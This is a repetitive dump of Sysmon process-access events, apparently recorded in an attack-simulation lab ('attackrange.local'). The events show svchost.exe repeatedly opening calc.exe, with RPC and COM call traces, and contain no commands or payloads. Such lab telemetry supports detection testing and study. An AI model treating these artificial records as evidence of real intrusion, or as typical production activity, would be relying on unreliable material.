22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360555Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360554Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360553Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360552Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360551Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360550Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360549Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360548Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360547Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360546Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360545Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360544Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360543Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360542Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360541Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360540Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360539Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360538Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360537Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360536Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360535Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.140{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360534Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 